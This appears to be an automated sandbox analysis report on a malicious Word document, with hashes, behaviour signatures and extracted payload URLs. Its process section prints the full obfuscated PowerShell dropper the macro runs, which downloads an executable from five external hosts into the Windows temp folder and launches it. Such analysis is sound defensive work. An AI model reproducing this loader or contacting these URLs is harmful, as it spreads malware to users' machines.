Analysis
-
max time kernel
146s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
12-05-2024 19:03
General
-
Target
3ba00216edcab9b42377acc49ba1baae_JaffaCakes118.doc
-
Size
265KB
-
MD5
3ba00216edcab9b42377acc49ba1baae
-
SHA1
8acf04cc03b1a81b96d6793af777f8a3abc10c79
-
SHA256
a27260a1fe5c659000bca59b786be94ae93ee51494d4d455fef197b6857c8de1
-
SHA512
bd80bcb056854f1bb8d52d5edcab54d31f0dd7d4cc7a219efa9c01a618f1c869bb8ff71d47a456ebfeb2e678f369e7a0c12fda51fea3f8672361b4218239bf35
-
SSDEEP
3072:0khgqkhgACSQKaSx+SbtYqS4fvS7GQRbSVuz1QzC9klhxztsZ5QPwYTXjdOSrv:0CwQK3RpVS7G4SVuz1QzLhxztsZGPw0
Malware Config
Extracted
http://www.hopeintlschool.org/FQ9AFMoF8GZKwyVvg_GC
http://antigua.aguilarnoticias.com/nYZZcHxoYdA
http://teatrul-de-poveste.ro/wp-content/themes/wcFvmRjqfPbdA
http://mywedphoto.ru/SPcBpzOvD6_bogkPa
http://epl.tmweb.ru/QBSLvgDEuAXTt_ETNrGAVki
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3ba00216edcab9b42377acc49ba1baae_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $idIgw8 = '$zMbv9jt0l = new-obj15464.589749099ect -com15464.589749099obj15464.589749099ect wsc15464.589749099ript.she15464.589749099ll;$ILTY2 = new-object sys15464.589749099tem.net.web15464.589749099client;$rEAav7Xix = new-object random;$YiwXfglRS = \"15464.589749099h15464.589749099t15464.589749099t15464.589749099p15464.589749099://www.hopeintlschool.org/FQ9AFMoF8GZKwyVvg_GC,15464.589749099h15464.589749099t15464.589749099t15464.589749099p15464.589749099://antigua.aguilarnoticias.com/nYZZcHxoYdA,15464.589749099h15464.589749099t15464.589749099t15464.589749099p15464.589749099://teatrul-de-poveste.ro/wp-content/themes/wcFvmRjqfPbdA,15464.589749099h15464.589749099t15464.589749099t15464.589749099p15464.589749099://mywedphoto.ru/SPcBpzOvD6_bogkPa,15464.589749099h15464.589749099t15464.589749099t15464.589749099p15464.589749099://epl.tmweb.ru/QBSLvgDEuAXTt_ETNrGAVki\".spl15464.589749099it(\",\");$iWybG3KDH = $rEAav7Xix.nex15464.589749099t(1, 65536);$jPBYO2 = \"c:\win15464.589749099dows\temp\put15464.589749099ty.exe\";for15464.589749099each($MOrNXe14G in $YiwXfglRS){try{$ILTY2.dow15464.589749099nlo15464.589749099adf15464.589749099ile($MOrNXe14G.ToS15464.589749099tring(), $jPBYO2);sta15464.589749099rt-pro15464.589749099cess $jPBYO2;break;}catch{}}'.replace('15464.589749099', $MGFnZb);$Wj3yxlHrU = '';iex($idIgw8);2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4160 --field-trial-handle=2304,i,6987730730348465820,3913273227385401271,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5309551a365a82ac70e2444282910abb0
SHA12e9a2b786a6fe89d9cda955779c576621c00c47e
SHA2564884bf213e74a407579ff44ae16fc3dcd9c058d2d1088e89e39a86a0b41a672e
SHA5127524f5f36ada6608506edf70f09eda191e6257c2c53a607190be42894c6a237b07bafae15af49d7a00ca11e36f41f13fd41f3e255cd893f127b82e900cb5e5c3
-
Filesize
74KB
MD521d964a53ac18573902a9ea972bbf6ae
SHA12484c690596b68871a413d36a2a83b6067f95d24
SHA256e90b6c9bd57a4aa7a4e0af2cd7603f4064545398a2c1bbeeb5b1ea1d8402ead6
SHA5129357cc59aa5f559099a4a60f5eca740d44bb75a7b8485c8d6a16939eafa9200c0ecbf9e96c10ae17353ba61422a567e678ddb20aa57b346f4fa3e579928d9a92
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB